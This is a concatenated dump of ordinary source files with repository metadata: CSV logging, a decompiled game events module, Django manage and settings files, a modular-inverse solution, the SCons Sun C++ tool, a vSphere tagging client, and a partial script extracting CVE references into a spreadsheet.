{'time': '10:52:00', 'limit': 11465607, 'address': '104.47.149.93'},
{'time': '14:56:12', 'limit': 109, 'address': '192.31.185.7'},
{'time': '18:56:35', 'limit': 6207, 'address': '2.228.164.197'}
]
import csv
#write to a CSV file
with open("logger.csv", "w") as logger_csv: # open a ne csv file in write mode
fields = ['time', 'address', 'limit'] #define the headers of the csv file from the dict keys
log_writer = csv.DictWriter(logger_csv, fieldnames=fields) #instantiate our CSV writer object and pass two arguments
#we can start adding lines to the CSV file itself!
log_writer.writeheader() #writes all the fields passed to fieldnames as the (headers) first row in our file
for item in access_log: #iterate through our list of data.
log_writer.writerow(item) #We call output_writer.writerow() with the item dictionaries which writes each line to the CSV file.
#read the CSV file
with open("logger.csv", "r") as logger_csv:
read = logger_csv.read()
print(read)
| [
"noreply@github.com"
] | noreply@github.com |
654671700188a0cf97b551f4f3716dcebb0ade85 | 48832d27da16256ee62c364add45f21b968ee669 | /res/scripts/client/gui/wgnc/events.py | 7291b9a2e8cb59d82254603badc1df9740d57f17 | [] | no_license | webiumsk/WOT-0.9.15.1 | 0752d5bbd7c6fafdd7f714af939ae7bcf654faf7 | 17ca3550fef25e430534d079876a14fbbcccb9b4 | refs/heads/master | 2021-01-20T18:24:10.349144 | 2016-08-04T18:08:34 | 2016-08-04T18:08:34 | 64,955,694 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 957 | py | # 2016.08.04 19:53:34 Střední Evropa (letní čas)
# Embedded file name: scripts/client/gui/wgnc/events.py
import Event
class _WGNCEvents(object):
    """Holds the WGNC item-notification events, all wired to one event manager."""
    __slots__ = ('__eManager', 'onItemShowByDefault', 'onItemShowByAction', 'onItemUpdatedByAction', 'onProxyDataItemShowByDefault')

    def __init__(self):
        super(_WGNCEvents, self).__init__()
        manager = Event.EventManager()
        self.__eManager = manager
        # Every public event shares the same manager so clear() can drop
        # all subscribers in one call.
        for event_name in ('onItemShowByDefault', 'onItemShowByAction',
                           'onItemUpdatedByAction', 'onProxyDataItemShowByDefault'):
            setattr(self, event_name, Event.Event(manager))

    def clear(self):
        """Unsubscribe every handler registered on any of the events."""
        self.__eManager.clear()


g_wgncEvents = _WGNCEvents()
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\wgnc\events.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.08.04 19:53:34 Střední Evropa (letní čas)
| [
"info@webium.sk"
] | info@webium.sk |
0aeb6218a917a30db42b3a1d8ecf90be05825eea | 288c9f231021c529d9eb8da6ae55aed779a68fe1 | /manage.py | 1e73e2222a941404e1ccc2eb0c45a15b50ea1c7c | [] | no_license | eddir/DiscreteMath | 7571b1d5314c1d121bb0c79e6324ac88e84aaff4 | db8b80f93a77a37fa6b84b40793337cae8dd3c67 | refs/heads/main | 2023-02-02T14:38:43.815430 | 2020-12-14T06:49:14 | 2020-12-14T06:49:14 | 313,072,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run administrative tasks."""
    # Point Django at this project's settings unless the caller overrides it.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DiscreteMath.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        hint = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(hint) from exc
    execute_from_command_line(sys.argv)


if __name__ == '__main__':
    main()
| [
"eddirworkmail@gmail.com"
] | eddirworkmail@gmail.com |
74aeddee7276ced1388155ecfd993003fe1085f4 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /NhPYFqfQcFXWvdH8t_5.py | f7d2eb52db8c7a1424e591f89c82b393d52cea0d | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,614 | py | """
A positive integer multiplied times its inverse is always equal to 1:
`17*(1/17)==1`. Modular arithmetic has a similar inverse function, although,
for modulus `m`, we are confined to integers from 0 to m-1. The modular
multiplicative inverse of 3 modulus 5 is equal to 2 because `(3*2)%5==1`.
Another example: the modular inverse of 17 modulus 1000007 is equal to 58824
because `(17*58824)%1000007==1`. The modular inverse, if it exists, must
always be in the range 0 to m-1.
Create a function that has arguments integer `n` and modulus `m`. The function
will return the modular inverse of `n` mod `m`. If the modular inverse does
not exist, return `False`.
### Examples
mod_inv(2, 3) ➞ 2
mod_inv(12, 47) ➞ 4
mod_inv(11, 33) ➞ False
mod_inv(55, 678) ➞ 37
mod_inv(81, 3455) ➞ 2346
### Notes
* Some of the test cases have rather large integers, so if you attempt to do a brute force search of the entire modular field, you may not be successful due to the 12 second time limit imposed by the server. See **Resources** for a more efficient approach.
* The modular inverse of a number `n` modulus `m` exists only if `n` and `m` are coprime (i.e. they have no common factors other than 1).
* One practical use of modular inverse is in public-key cryptography like RSA where it can be used to determine the value of the private key.
"""
def egcd(j, k):
    """Extended Euclid: return (g, a, b) with g == gcd(j, k) and j*a + k*b == g."""
    if j == 0:
        return (k, 0, 1)
    quotient, remainder = divmod(k, j)
    g, s, t = egcd(remainder, j)
    return (g, t - quotient * s, s)


def mod_inv(j, m):
    """Return the modular multiplicative inverse of j mod m, or False if none exists.

    An inverse exists only when gcd(j, m) == 1; the result is always in 0..m-1.
    """
    g, coeff, _ = egcd(j, m)
    if g != 1:
        return False
    return coeff % m
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
ee8b3323e5379d9b8638bc70813f9fd8634ea62e | 362b8828ad4a79fe899d2b66ce2f5c516f338f20 | /python-solutions/classRoomHandsOn-Day02/04.py | 990c7a80933e273358446767c5c97609f64692d5 | [] | no_license | Snehagovindharajan/GraduateTrainingProgram2019 | 770e888c2615de438bab5899cf2b4331582b4803 | 019a8fdbd5d372b6914be9f5f6427cfc034c761f | refs/heads/master | 2020-07-07T00:58:02.652838 | 2019-12-27T11:06:20 | 2019-12-27T11:06:20 | 203,193,092 | 0 | 1 | null | 2019-08-19T14:49:51 | 2019-08-19T14:49:51 | null | UTF-8 | Python | false | false | 429 | py | # Write a program which accepts a sequence of comma-separated numbers from console and generate a list and a tuple
# which contains every number. Suppose the following input is supplied to the program: 34,67,55,33,12,98 Then,
# the output should be: ['34', '67', '55', '33', '12', '98'] ('34', '67', '55', '33', '12', '98')
# Read the comma-separated values once, then display them as a list and a tuple.
numbers = input().split(',')
print("List : ", numbers)
print("Tuple : ", tuple(numbers))
| [
"snehag2205@gmail.com"
] | snehag2205@gmail.com |
ef89ebbee0f0db544ff5bf1b817aff77405ecae0 | 7d274ce8dae971228a23157a409b561020c22f66 | /tools/packages/SCons/Tool/sunc++.py | 00fb8c85284d59226fd62f3cfb8e577783661690 | [] | no_license | Eigenlabs/EigenD-Contrib | a212884d4fdf9ae0e1aeb73f6311606212e02f94 | 586fe17471571802295c792697f255e6cab51b17 | refs/heads/master | 2020-05-17T07:54:48.668925 | 2013-02-05T10:20:56 | 2013-02-05T10:20:56 | 3,239,072 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,744 | py | """SCons.Tool.sunc++
Tool-specific initialization for C++ on SunOS / Solaris.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/sunc++.py 4577 2009/12/27 19:43:56 scons"
import SCons
import os
import re
import subprocess
cplusplus = __import__('c++', globals(), locals(), [])
package_info = {}  # cache: package name -> (install path or None, version or None)

def get_package_info(package_name, pkginfo, pkgchk):
    """Look up where a Solaris package is installed and which version it is.

    Returns a (pathname, version) tuple, either element possibly None, and
    caches the answer in the module-level ``package_info`` dict.  Three
    sources are consulted: the /var/sadm/install/contents database for the
    install path, ``pkginfo -l`` for the version, and ``pkgchk -l`` as a
    fallback for the path.  Missing files or tools are tolerated silently.
    """
    try:
        return package_info[package_name]
    except KeyError:
        pass
    version = None
    pathname = None
    # The contents database maps installed files to their owning package;
    # look for the CC binary that belongs to package_name.
    try:
        f = open('/var/sadm/install/contents', 'r')
    except EnvironmentError:
        pass
    else:
        try:
            sadm_contents = f.read()
        finally:
            f.close()  # fix: the original leaked this file handle
        sadm_re = re.compile('^(\S*/bin/CC)(=\S*)? %s$' % package_name, re.M)
        sadm_match = sadm_re.search(sadm_contents)
        if sadm_match:
            pathname = os.path.dirname(sadm_match.group(1))
    version = _query_tool(pkginfo, package_name, '^ *VERSION:\s*(.*)$')
    if pathname is None:
        cc_path = _query_tool(pkgchk, package_name,
                              r'^Pathname:\s*(.*/bin/CC)$')
        if cc_path is not None:
            pathname = os.path.dirname(cc_path)
    package_info[package_name] = (pathname, version)
    return package_info[package_name]

def _query_tool(tool, package_name, pattern):
    """Run ``tool -l package_name`` and return the first regex group match.

    Returns None when the tool is missing or its output did not match.
    """
    devnull = open(os.devnull, 'w')
    try:
        try:
            p = subprocess.Popen([tool, '-l', package_name],
                                 stdout=subprocess.PIPE,
                                 stderr=devnull)
        except EnvironmentError:
            return None
        output = p.communicate()[0]
        # fix: on Python 3 the pipe yields bytes; decode so the str regex
        # applies (on Python 2 bytes is str, so this is a no-op).
        if not isinstance(output, str):
            output = output.decode('utf-8', 'replace')
        match = re.compile(pattern, re.M).search(output)
        if match:
            return match.group(1)
        return None
    finally:
        devnull.close()  # fix: the original leaked the /dev/null handle

# Use the Solaris package tools (pkginfo/pkgchk) to figure out where the
# SunPRO C++ compiler is installed and which version it is.
# NOTE: the old comment here mentioned lslpp, which is the AIX tool; the
# code has always used the Solaris equivalents.
def get_cppc(env):
    """Return (path, 'CC', 'CC', version) describing the SunPRO C++ compiler.

    Falls back to the directory of $CXX when package lookup fails; path and
    version are None when nothing could be determined.
    """
    cxx = env.subst('$CXX')
    if cxx:
        cppcPath = os.path.dirname(cxx)
    else:
        cppcPath = None
    cppcVersion = None
    pkginfo = env.subst('$PKGINFO')
    pkgchk = env.subst('$PKGCHK')
    for package in ['SPROcpl']:
        path, version = get_package_info(package, pkginfo, pkgchk)
        if path and version:
            cppcPath, cppcVersion = path, version
            break
    return (cppcPath, 'CC', 'CC', cppcVersion)
def generate(env):
    """Add Builders and construction variables for SunPRO C++."""
    path, cxx, shcxx, version = get_cppc(env)
    if path:
        cxx = os.path.join(path, cxx)
        shcxx = os.path.join(path, shcxx)
    # Let the generic C++ tool set up the builders first, then layer the
    # SunPRO-specific construction variables on top.
    cplusplus.generate(env)
    settings = (
        ('CXX', cxx),
        ('SHCXX', shcxx),
        ('CXXVERSION', version),
        ('SHCXXFLAGS', SCons.Util.CLVar('$CXXFLAGS -KPIC')),
        ('SHOBJPREFIX', 'so_'),
        ('SHOBJSUFFIX', '.o'),
    )
    for name, value in settings:
        env[name] = value
def exists(env):
    """Return the path to the SunPRO CC binary if it is installed, else None."""
    path, cxx, shcxx, version = get_cppc(env)
    if not (path and cxx):
        return None
    cppc = os.path.join(path, cxx)
    return cppc if os.path.exists(cppc) else None
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| [
"jim@eigenlabs.com"
] | jim@eigenlabs.com |
b6f5269544504643167d88068a179f4d257d958c | 0b81ac4f400a0880ca8fa48886c6928822cd42f4 | /Code/1- Getting Started/Start/storefront2/storefront/settings.py | 520a04eb9189e33510eb3b73609781dbe96b8278 | [] | no_license | ojaoc/Django-MoshHamedani-Part2 | 850828d6cc6cee2a50f2f84e9c36fcc2c066dc64 | 0c63833de4e7fa66eeb51964df716dca5d8d470d | refs/heads/master | 2023-07-31T10:21:37.827555 | 2021-10-03T13:12:44 | 2021-10-03T13:12:44 | 409,772,085 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,622 | py | """
Django settings for storefront project.
Generated by 'django-admin startproject' using Django 3.2.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; rotate it and load
# it from the environment before any non-local deployment.
SECRET_KEY = "django-insecure-hs6j037urx6iav+7#10%-vu4l4f5@@-1_zo)oft4g7$vf2$jmp"
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty is acceptable while DEBUG is True; must be populated for production.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    "django.contrib.admin",
    "django.contrib.sessions",
    "django.contrib.auth",
    "django.contrib.contenttypes",
    "django.contrib.messages",
    "django.contrib.staticfiles",
    "rest_framework",
    "playground",
    "debug_toolbar",
    "store",
    "store_custom",
    "tags",
    "likes",
]
# debug_toolbar's middleware is listed first so it can wrap every response.
MIDDLEWARE = [
    "debug_toolbar.middleware.DebugToolbarMiddleware",
    "django.middleware.security.SecurityMiddleware",
    "django.contrib.sessions.middleware.SessionMiddleware",
    "django.middleware.common.CommonMiddleware",
    "django.middleware.csrf.CsrfViewMiddleware",
    "django.contrib.auth.middleware.AuthenticationMiddleware",
    "django.contrib.messages.middleware.MessageMiddleware",
    "django.middleware.clickjacking.XFrameOptionsMiddleware",
]
# Client IPs for which the debug toolbar is shown.
INTERNAL_IPS = [
    # ...
    "127.0.0.1",
    # ...
]
ROOT_URLCONF = "storefront.urls"
TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "DIRS": [],
        "APP_DIRS": True,
        "OPTIONS": {
            "context_processors": [
                "django.template.context_processors.debug",
                "django.template.context_processors.request",
                "django.contrib.auth.context_processors.auth",
                "django.contrib.messages.context_processors.messages",
            ],
        },
    },
]
WSGI_APPLICATION = "storefront.wsgi.application"
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
# NOTE(review): credentials are hard-coded for local development; read them
# from the environment for any shared deployment.
DATABASES = {
    "default": {
        "ENGINE": "django.db.backends.mysql",
        "NAME": "storefront2",
        "HOST": "localhost",
        "USER": "django.storefront",
        "PASSWORD": "password",
    }
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        "NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
    },
    {
        "NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
    },
    {
        "NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
    },
    {
        "NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = "/static/"
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"
# Return DRF decimal fields as JSON numbers instead of strings.
REST_FRAMEWORK = {"COERCE_DECIMAL_TO_STRING": False}
| [
"correia.jafonso@gmail.com"
] | correia.jafonso@gmail.com |
dbd8e45621f1bb91a4e6dec314813333eca56509 | 30e2fd75141ef6b200b9b7d038fa154af183df3d | /paparajotes_y_bellotas/conftest.py | 7a3969f7c42ca02cf06c4fae9ea69dd8fb5a81bc | [
"MIT"
] | permissive | palvarez89/paparajotesybellotas | 7ee6c2f881ada3b69b40cb9ee6418b9f0cf16aab | 0600b4bc5cd9962d1ce6425ceb0db173f7d32b71 | refs/heads/master | 2022-05-01T07:13:29.513604 | 2019-09-10T15:50:59 | 2019-09-10T15:50:59 | 159,998,294 | 0 | 0 | MIT | 2022-04-22T21:25:24 | 2018-12-01T23:59:24 | CSS | UTF-8 | Python | false | false | 436 | py | import pytest
from django.conf import settings
from django.test import RequestFactory
from paparajotes_y_bellotas.users.tests.factories import UserFactory
@pytest.fixture(autouse=True)
def media_storage(settings, tmpdir):
settings.MEDIA_ROOT = tmpdir.strpath
@pytest.fixture
def user() -> settings.AUTH_USER_MODEL:
return UserFactory()
@pytest.fixture
def request_factory() -> RequestFactory:
return RequestFactory()
| [
"palvarez89@gmail.com"
] | palvarez89@gmail.com |
c417369002aaab9703e24ab5f01270d20b30868a | 5090ee217ce19d912ff91715ed1d01dfd3511f02 | /actions/vmwarelib/tagging.py | a4061b7eeba904a36fdde9803d647d6e0f32ce6d | [
"Apache-2.0"
] | permissive | jschoewe/stackstorm-vsphere | a12e7a7f570504ff65da47763e6032174b9de538 | db822e9c3b05d939053dafaeed2f0bf81384abd0 | refs/heads/master | 2020-04-28T12:57:00.884520 | 2020-03-10T15:06:00 | 2020-03-10T15:06:00 | 175,292,523 | 0 | 0 | Apache-2.0 | 2020-03-10T15:06:01 | 2019-03-12T20:37:20 | Python | UTF-8 | Python | false | false | 9,142 | py | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class VmwareTagActions(object):
    """Thin client for the vSphere Automation (6.5) REST tagging endpoints."""
    # vSphere Automation API (6.5)
    # API Reference: https://code.vmware.com/web/dp/explorer-apis?id=191
    def __init__(self, session, url_base):
        # session: an authenticated requests-style session;
        # url_base: scheme://host prefix each endpoint path is appended to.
        self.session = session
        self.url_base = url_base
    ############################################################################
    # Request Actions
    def make_url(self, endpoint):
        """Return the absolute URL for an endpoint path."""
        return self.url_base + endpoint
    def get(self, endpoint):
        """GET *endpoint*; raise on HTTP error; return the decoded JSON body."""
        url = self.make_url(endpoint)
        response = self.session.get(url)
        response.raise_for_status()
        return response.json()
    def post(self, endpoint, payload=None):
        """POST *payload* as JSON; return the decoded body, or None if empty."""
        url = self.make_url(endpoint)
        response = self.session.post(url, json=payload)
        response.raise_for_status()
        if response.text:
            return response.json()
        return None
    def delete(self, endpoint, payload=None):
        """DELETE *endpoint*; return the decoded body, or None if empty."""
        url = self.make_url(endpoint)
        response = self.session.delete(url, json=payload)
        response.raise_for_status()
        if response.text:
            return response.json()
        return None
    ############################################################################
    # Category Functions
    def category_list(self):
        """Return the IDs of all tag categories."""
        response = self.get("/rest/com/vmware/cis/tagging/category")
        return response['value']
    def category_get(self, category_id):
        """Return the full category object for *category_id*."""
        response = self.get("/rest/com/vmware/cis/tagging/category/id:{}".format(category_id))
        return response['value']
    def category_delete(self, category_id):
        """Delete the category; returns the response body (usually None)."""
        response = self.delete("/rest/com/vmware/cis/tagging/category/id:{}".format(category_id))
        return response
    def category_find_by_name(self, name):
        """Return the first category whose name matches *name*, or None.

        Note: fetches every category one by one, so cost grows with the
        number of categories on the server.
        """
        category_id_list = self.category_list()
        for category_id in category_id_list:
            category = self.category_get(category_id)
            if category["name"] == name:
                return category
        return None
    def category_create_spec(self):
        """Return a default category create-spec dict."""
        return {"name": "",
                "description": "",
                "cardinality": "SINGLE", # "SINGLE", "MULTIPLE"
                "associable_types": ["VirtualMachine"]} # One or more VMWARE_OBJECT_TYPES
    def category_create(self, name, description=None, cardinality=None,
                        associable_types=None):
        """Create a category; returns the new category's ID."""
        create_spec = self.category_create_spec()
        create_spec['name'] = name
        if description:
            create_spec['description'] = description
        if cardinality:
            create_spec['cardinality'] = cardinality
        if associable_types is not None:
            create_spec['associable_types'] = associable_types
        response = self.post("/rest/com/vmware/cis/tagging/category",
                             payload={'create_spec': create_spec})
        return response['value']
    def category_get_or_create(self, name, description=None, cardinality=None,
                               associable_types=None):
        """Return the category named *name*, creating it when absent."""
        category = self.category_find_by_name(name)
        if not category:
            # on success this returns the new category's id
            category_id = self.category_create(name, description, cardinality, associable_types)
            category = self.category_get(category_id)
        return category
    ############################################################################
    # Tag Functions
    def tag_list(self, category_id=None):
        """Return tag IDs, optionally restricted to one category."""
        # Return all tags from the given category, or all tags from all categories
        if category_id:
            response = self.post("/rest/com/vmware/cis/tagging/tag/id:{}?~action="
                                 "list-tags-for-category".format(category_id))
        else:
            response = self.get("/rest/com/vmware/cis/tagging/tag")
        return response["value"]
    def tag_get(self, tag_id):
        """Return the full tag object for *tag_id*."""
        response = self.get("/rest/com/vmware/cis/tagging/tag/id:{}".format(tag_id))
        return response['value']
    def tag_delete(self, tag_id):
        """Delete the tag; returns the response body (usually None)."""
        response = self.delete("/rest/com/vmware/cis/tagging/tag/id:{}".format(tag_id))
        return response
    # If a category ID is not given then this will return the first tag it finds with the given name
    def tag_find_by_name(self, name, category_id=None):
        """Return the first matching tag object, or None."""
        tag_id_list = self.tag_list(category_id)
        for tag_id in tag_id_list:
            tag = self.tag_get(tag_id)
            if tag['name'] == name:
                return tag
        return None
    def tag_create_spec(self):
        """Return a default tag create-spec dict."""
        return {"name": "",
                "description": "",
                "category_id": ""}
    def tag_create(self, name, category_id, description=None):
        """Create a tag inside *category_id*; returns the new tag's ID."""
        create_spec = self.tag_create_spec()
        create_spec["name"] = name
        create_spec["category_id"] = category_id
        if description:
            create_spec["description"] = description
        response = self.post("/rest/com/vmware/cis/tagging/tag",
                             payload={"create_spec": create_spec})
        return response["value"]
    # This does not create a new category, it will fail if the given category ID doesn't exist
    def tag_get_or_create(self, name, category_id, description=None):
        """Return the tag named *name* in *category_id*, creating it when absent."""
        tag = self.tag_find_by_name(name, category_id)
        if not tag:
            # on success this returns the new tag's id
            created_tag_id = self.tag_create(name, category_id, description)
            tag = self.tag_get(created_tag_id)
        return tag
    ############################################################################
    # Tag Association Functions
    def tag_association_endpoint(self, action, tag_id=None):
        """Build a tag-association endpoint path for *action* (and *tag_id*)."""
        if tag_id:
            return "/rest/com/vmware/cis/tagging/tag-association/id:{}?~action={}".format(tag_id,
                                                                                          action)
        else:
            return "/rest/com/vmware/cis/tagging/tag-association?~action={}".format(action)
    def tag_association_attach(self, tag_id, obj_type, obj_id):
        """Attach one tag to an object (obj_type e.g. 'VirtualMachine')."""
        return self.post(self.tag_association_endpoint("attach", tag_id),
                         payload={"object_id": {"id": obj_id,
                                                "type": obj_type}})
    def tag_association_attach_multiple(self, tag_ids, obj_type, obj_id):
        """Attach several tags to one object in a single request."""
        return self.post(self.tag_association_endpoint("attach-multiple-tags-to-object"),
                         payload={"tag_ids": tag_ids,
                                  "object_id": {"id": obj_id,
                                                "type": obj_type}})
    def tag_association_detach(self, tag_id, obj_type, obj_id):
        """Detach one tag from an object."""
        return self.post(self.tag_association_endpoint("detach", tag_id),
                         payload={"object_id": {"id": obj_id,
                                                "type": obj_type}})
    def tag_association_list_attached_tags(self, obj_type, obj_id):
        """Return the IDs of every tag attached to the object."""
        response = self.post(self.tag_association_endpoint("list-attached-tags"),
                             payload={"object_id": {"id": obj_id,
                                                    "type": obj_type}})
        return response['value']
    def tag_association_list_attached_objects(self, tag_id):
        """Return the objects that carry the given tag."""
        response = self.post(self.tag_association_endpoint("list-attached-objects",
                                                           tag_id))
        return response['value']
    def tag_association_detach_category(self, category_id, obj_type, obj_id):
        """Detach every tag of *category_id* from the object; return those tags."""
        # get all tags for this object
        tag_id_list = self.tag_association_list_attached_tags(obj_type, obj_id)
        # if the tag's category matches category_id then detach the tag
        results = []
        for tag_id in tag_id_list:
            tag = self.tag_get(tag_id)
            if tag['category_id'] == category_id:
                self.tag_association_detach(tag_id, obj_type, obj_id)
                results.append(tag)
        return results
    def tag_association_replace(self, tag_id, obj_type, obj_id):
        """Make *tag_id* the object's only tag within that tag's category."""
        # remove all tags
        tag = self.tag_get(tag_id)
        self.tag_association_detach_category(tag['category_id'], obj_type, obj_id)
        # attach the provided tag in this category to the object
        return self.tag_association_attach(tag_id, obj_type, obj_id)
| [
"john.schoewe@encore.tech"
] | john.schoewe@encore.tech |
29e3a9b62615e575e92f4df9dfc8008797700006 | 23c3b980df2cb37928ddf430ed62c1b4de7d4a9a | /ParseJsonOld.py | 6258be6d11875a09222d6de57e659c9c99075e55 | [] | no_license | DeviceObject/PythonCode | 6a95eb59fc33b218d5f930780eb73df7f06760e6 | 24191bc099c28333f976cbbc06b255e156e7da78 | refs/heads/master | 2022-10-17T22:03:26.913913 | 2022-10-12T02:46:01 | 2022-10-12T02:46:01 | 92,244,336 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,708 | py | import os
import json
import urllib
import xlrd
import xlwt
import time
from xlutils.copy import copy
def write_excel(excel_file, write_data):
    """Append one row of rule data to an .xls report, creating it if needed.

    On first call the workbook is created with a styled header row and
    write_data goes into row 1; on later calls the existing workbook is
    copied via xlutils and write_data is appended after the last row.
    """
    if not os.path.exists(excel_file):
        line_title = ["RuleId", "CVE Number", "CWE", "BID", "Descript"]
        new_file = xlwt.Workbook(encoding='utf-8')
        new_sheet = new_file.add_sheet('RuleInfo', cell_overwrite_ok=True)
        for i, title in enumerate(line_title):
            # The wide columns (CVE list and description) get the larger font.
            # fix: the original used `and`, which can never be true for one
            # title, so every header was rendered at height 300.
            if title == "CVE Number" or title == "Descript":
                new_sheet.write(0, i, title, set_style('Times New Roman', 500, True))
            else:
                new_sheet.write(0, i, title, set_style('Times New Roman', 300, True))
        for i, value in enumerate(write_data):
            new_sheet.write(1, i, value)
        new_file.save(excel_file)
    else:
        workbook = xlrd.open_workbook(excel_file)
        sheets = workbook.sheet_names()
        worksheet = workbook.sheet_by_name(sheets[0])
        rows_old = worksheet.nrows  # next free row index
        new_workbook = copy(workbook)
        new_worksheet = new_workbook.get_sheet(0)
        for i, value in enumerate(write_data):
            new_worksheet.write(rows_old, i, value)
        new_workbook.save(excel_file)
def set_style(name, height, bold=False):
    """Build an xlwt cell style with the given font name, height and weight."""
    style = xlwt.XFStyle()
    font = xlwt.Font()
    font.name = name
    font.bold = bold
    # fix: xlwt's Font attribute is spelled `colour_index`; assigning to
    # `color_index` created an unused attribute, so the intended colour
    # (index 4, blue) was never applied.
    font.colour_index = 4
    font.height = height
    style.font = font
    return style
def search_signature(origal_data, start_signature, endsignature):
    """Return every substring found between the two markers, in order.

    E.g. search_signature("reference:cve,2011-0001;", "reference:cve,", ";")
    yields ["2011-0001"].  An unterminated final occurrence is ignored.

    fix: the original searched for the end marker starting at the *start*
    marker's position, so an end marker overlapping the start marker could
    produce garbage slices and leave the cursor stuck (infinite loop); the
    end marker is now searched strictly after the start marker.
    """
    matches = []
    pos = 0
    while True:
        start = origal_data.find(start_signature, pos)
        if start == -1:
            break
        payload_start = start + len(start_signature)
        end = origal_data.find(endsignature, payload_start)
        if end == -1:
            break
        matches.append(origal_data[payload_start:end])
        pos = end  # continue scanning at the end marker
    return matches
def fetch_cve_number(input_json_file, output_file):
    """Walk a rule-definition JSON file and append one spreadsheet row per rule.

    The file is expected to map rule IDs to objects whose "product_feature"
    member maps platform names ("agentless" is skipped) to rule attributes
    such as "rule_id", "orig_rule" and "desc_zh" -- schema assumed from the
    original code, not formally documented.
    Returns False when the input file is missing, True otherwise.
    """
    if not os.path.exists(input_json_file):
        print("json file isn't exist")
        return False
    with open(input_json_file, 'r', encoding='utf-8') as file_json:
        file_data = file_json.read()
    json_data = json.loads(file_data)
    for item in json_data.items():
        origal_id = item[0]  # kept for parity with the original (unused)
        for sub_item in item[1].items():
            if sub_item[0] != "product_feature":
                continue
            for third_item in sub_item[1].items():
                rule_type = third_item[0]
                if rule_type == "agentless":
                    continue
                # Robustness: make sure a row can still be built when some
                # attributes are absent from this rule.
                rule_id = ""
                cve_name = ""
                rule_desc = ""
                for fourth_item in third_item[1].items():
                    if fourth_item[0] == "platform":
                        platform = fourth_item[1]
                    elif fourth_item[0] == "cvss":
                        cvss = fourth_item[1]
                    elif fourth_item[0] == "orig_rule":
                        origal_rule = fourth_item[1]
                        # Extract the CVE references embedded in the rule text.
                        cve_list = search_signature(origal_rule, "reference:cve,", ";")
                        cve_name = ""
                        for cve_item in cve_list:
